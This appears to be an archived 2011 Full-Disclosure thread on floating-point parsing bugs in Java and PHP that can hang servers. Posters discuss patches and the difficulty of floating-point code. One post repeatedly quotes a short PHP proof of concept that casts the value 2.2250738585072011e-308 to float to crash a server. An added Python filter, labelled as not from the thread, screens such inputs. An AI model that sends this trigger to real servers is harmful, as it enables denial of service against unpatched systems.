Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-10 Thread Yorian Wiltjer
To all,

PHP was fixed in versions 5.3.5 and 5.2.17, released on Jan 6th 2011.
And the bug is only in the 32-bit version of PHP (even on a 64-bit CPU).
http://www.php.net/archive/2011.php#id2011-01-06-1

Le Reg reports that Oracle fixed the mark of the beast in their new patch,
after it had been there for 10 years.
http://www.theregister.co.uk/2011/02/09/java_floating_point_bug_fixed/

PHP dev team time: one month
Java developers: about ten years

So yay opensource.

With friendly greetings,
Yorian

PS,
Don't forget to upgrade

2011/2/10 Troy Aerojam 

> It borders idiocy this hasn't been plugged.
>
> Aerojam
>
> --- On Wed, 2/9/11, Leon Kaiser wrote:
>
> From: Leon Kaiser
> Subject: [Full-disclosure] {Java,PHP} Server Exploits
> To: full-disclosure@lists.grok.org.uk
> Date: Wednesday, February 9, 2011, 5:40 PM
>
> http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
>
> http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server<http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Servers>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread Troy Aerojam
It borders idiocy this hasn't been plugged.

Aerojam

--- On Wed, 2/9/11, Leon Kaiser  wrote:

From: Leon Kaiser 
Subject: [Full-disclosure] {Java,PHP} Server Exploits
To: full-disclosure@lists.grok.org.uk
Date: Wednesday, February 9, 2011, 5:40 PM

http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers

http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server

Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread DiKKy Heartiez

Breakin' fuckin' news!  (Or not!)  One of those stories is over a month old, 
the other is over a week old.  Nothing particularly exciting or unexpected in 
either.  It's just typical GPL code quality.

From: litera...@gmail.com
To: full-disclosure@lists.grok.org.uk
Date: Wed, 9 Feb 2011 12:40:54 -0500
Subject: [Full-disclosure] {Java,PHP} Server Exploits

http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers

http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server

Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread Christian Sciberras
You've misread my statement, I didn't say floating point is trivial.
I actually said securing a base data type is trivial.

I'd give you credit if this was a complex issue in, say, deserializing some
complex type, but not float.

How many simple types does PHP have? Integer, float, string and boolean.
Keep in mind that when we talk about floating point in PHP, we're talking
about The Float (64bit || 32bit), not tens of different floating types
ranging from 8 bits to 1024...

Cheers,
Chris.

On Wed, Feb 9, 2011 at 9:13 PM,  wrote:

> On Wed, 09 Feb 2011 20:54:41 +0100, Christian Sciberras said:
>
> > $f=floatval("2.2250738585072011e-308");
> > echo 'Try 2 => '.$f.'';
>
> > Plus, I'm a bit amazed such a bug exists in PHP - since converting to
> > floating point is a trivial operation, it should have been limited and
> > safe-guarded from the start.
>
> Take a careful gander at that number, then go look at the floating point spec -
> it's a specific corner case that isn't obviously trivial to get right (doing
> floating point *right* is a lot harder than it looks - take a class on
> numerical methods sometime, you spend 75% of your time dealing with rounding
> errors in the last bit).
>
> Having said that, anybody writing floating point support for a package should
> probably google 'floating point paranoia' and learn what sort of things to test
> for. :)

Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread Valdis . Kletnieks
On Wed, 09 Feb 2011 20:54:41 +0100, Christian Sciberras said:

> $f=floatval("2.2250738585072011e-308");
> echo 'Try 2 => '.$f.'';

> Plus, I'm a bit amazed such a bug exists in PHP - since converting to
> floating point is a trivial operation, it should have been limited and
> safe-guarded from the start.

Take a careful gander at that number, then go look at the floating point spec -
it's a specific corner case that isn't obviously trivial to get right (doing
floating point *right* is a lot harder than it looks - take a class on
numerical methods sometime, you spend 75% of your time dealing with rounding
errors in the last bit).

Having said that, anybody writing floating point support for a package should
probably google 'floating point paranoia' and learn what sort of things to test
for. :)



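Added example, not part of any poster's message: a pre-filter that screens a numeric field with exact rational arithmetic, never a binary float conversion, and refuses decimal text lying between the largest subnormal double and DBL_MIN, which is where the literal quoted in this thread sits. It is written in Python so the check runs outside the affected PHP parser; `screen_float_input`, `MAX_LEN` and `MAX_EXPONENT` are hypothetical names and assumed limits, and treating the whole gap as suspect is a conservative assumption, not a statement of the exact trigger set.

```python
import re
from fractions import Fraction

# Exact endpoints of the gap between the largest subnormal double and the
# smallest normal double (DBL_MIN = 2**-1022); both are multiples of 2**-1074.
LARGEST_SUBNORMAL = Fraction(2**52 - 1, 2**1074)
SMALLEST_NORMAL = Fraction(2**52, 2**1074)

# Plain decimal syntax only: sign, digits, optional fraction, optional exponent.
_DECIMAL = re.compile(r'[+-]?(\d*)(?:\.(\d*))?(?:[eE]([+-]?\d+))?', re.ASCII)

MAX_LEN = 512        # assumed policy limit for a numeric form field
MAX_EXPONENT = 1000  # assumed bound; keeps 10**exponent cheap to compute


def screen_float_input(text):
    """Return 'accept', 'reject-format' or 'reject-boundary' for a numeric
    field, deciding on the exact decimal value rather than its spelling."""
    text = text.strip()
    if len(text) > MAX_LEN:
        return 'reject-format'
    m = _DECIMAL.fullmatch(text)
    if m is None:
        return 'reject-format'
    int_digits, frac_digits = m.group(1), m.group(2) or ''
    if not (int_digits + frac_digits):
        return 'reject-format'      # no digits at all, e.g. "." or "e5"
    exponent = int(m.group(3) or 0)
    if abs(exponent) > MAX_EXPONENT:
        return 'reject-format'      # would force an enormous integer
    # magnitude = digits * 10**(exponent - fractional digit count), exactly;
    # the sign is ignored because the gap is symmetric around zero.
    scale = Fraction(10) ** (exponent - len(frac_digits))
    magnitude = int(int_digits + frac_digits) * scale
    if LARGEST_SUBNORMAL <= magnitude <= SMALLEST_NORMAL:
        return 'reject-boundary'
    return 'accept'


if __name__ == '__main__':
    # Constructed inputs: the thread's literal, a respelling of it, and others.
    for sample in ('2.2250738585072011e-308', '22250738585072011e-324',
                   '3.14', '1e999999999', 'abc'):
        print(sample, '->', screen_float_input(sample))
```

A filter that matches only the literal string misses other spellings of the same number; comparing exact values covers them, and the length and exponent limits keep the filter itself cheap to run.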

Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread Cal Leeming [Simplicity Media Ltd]
Christian, this issue has been 'floating' around for several months now.

On Wed, Feb 9, 2011 at 7:56 PM, Christian Sciberras wrote:

> Ah, been reading more about it, seems it was fixed.
>
> Still, there should have been safeguards around this - I'm thinking they
> should check existing conversion routines to ensure they're safe...
>
> On Wed, Feb 9, 2011 at 8:54 PM, Christian Sciberras wrote:
>
>> Was it fixed? What's the current status?
>>
>> This sounds like a major issue, and the lack of info about it is darn
>> impressive.
>>
>>
>> I tried it on my test Windows WAMP server:
>>
>> <?php
>> ob_implicit_flush(true);
>>
>> echo 'Start test...';
>>
>> $f=(float)"2.2250738585072011e-308";
>> echo 'Try 1 => '.$f.'';
>>
>> $f=floatval("2.2250738585072011e-308");
>> echo 'Try 2 => '.$f.'';
>>
>> $f="2.2250738585072011e-308";
>> echo 'Try 3 => '.(float)$f.'';
>>
>> echo 'Test failed, server not vulnerable!';
>>
>> ?>
>>
>> All three tests succeeded in crashing the server.
>>
>> With all due respect, this should NOT have been disclosed without being
>> FIXED (as it seems to me).
>> Plus, I'm a bit amazed such a bug exists in PHP - since converting to
>> floating point is a trivial operation, it should have been limited and
>> safe-guarded from the start.
>> There are a lot of servers out there happily accepting input as floating
>> point values, this bug should be top priority...
>>
>>
>> Chris.
>>
>>
>>
>> On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser  wrote:
>>
>>>
>>> http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
>>>
>>> http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server

Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread Christian Sciberras
Ah, been reading more about it, seems it was fixed.

Still, there should have been safeguards around this - I'm thinking they
should check existing conversion routines to ensure they're safe...

On Wed, Feb 9, 2011 at 8:54 PM, Christian Sciberras wrote:

> Was it fixed? What's the current status?
>
> This sounds like a major issue, and the lack of info about it is darn
> impressive.
>
>
> I tried it on my test Windows WAMP server:
>
> <?php
> ob_implicit_flush(true);
>
> echo 'Start test...';
>
> $f=(float)"2.2250738585072011e-308";
> echo 'Try 1 => '.$f.'';
>
> $f=floatval("2.2250738585072011e-308");
> echo 'Try 2 => '.$f.'';
>
> $f="2.2250738585072011e-308";
> echo 'Try 3 => '.(float)$f.'';
>
> echo 'Test failed, server not vulnerable!';
>
> ?>
>
> All three tests succeeded in crashing the server.
>
> With all due respect, this should NOT have been disclosed without being
> FIXED (as it seems to me).
> Plus, I'm a bit amazed such a bug exists in PHP - since converting to
> floating point is a trivial operation, it should have been limited and
> safe-guarded from the start.
> There are a lot of servers out there happily accepting input as floating
> point values, this bug should be top priority...
>
>
> Chris.
>
>
>
> On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser  wrote:
>
>>
>> http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
>>
>> http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server

Re: [Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread Christian Sciberras
Was it fixed? What's the current status?

This sounds like a major issue, and the lack of info about it is darn
impressive.


I tried it on my test Windows WAMP server:

<?php
ob_implicit_flush(true);

echo 'Start test...';

$f=(float)"2.2250738585072011e-308";
echo 'Try 1 => '.$f.'';

$f=floatval("2.2250738585072011e-308");
echo 'Try 2 => '.$f.'';

$f="2.2250738585072011e-308";
echo 'Try 3 => '.(float)$f.'';

echo 'Test failed, server not vulnerable!';

?>

All three tests succeeded in crashing the server.

With all due respect, this should NOT have been disclosed without being
FIXED (as it seems to me).
Plus, I'm a bit amazed such a bug exists in PHP - since converting to
floating point is a trivial operation, it should have been limited and
safe-guarded from the start.
There are a lot of servers out there happily accepting input as floating
point values, this bug should be top priority...


Chris.



On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser  wrote:

>
> http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
>
> http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server

[Full-disclosure] {Java,PHP} Server Exploits

2011-02-09 Thread Leon Kaiser
http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
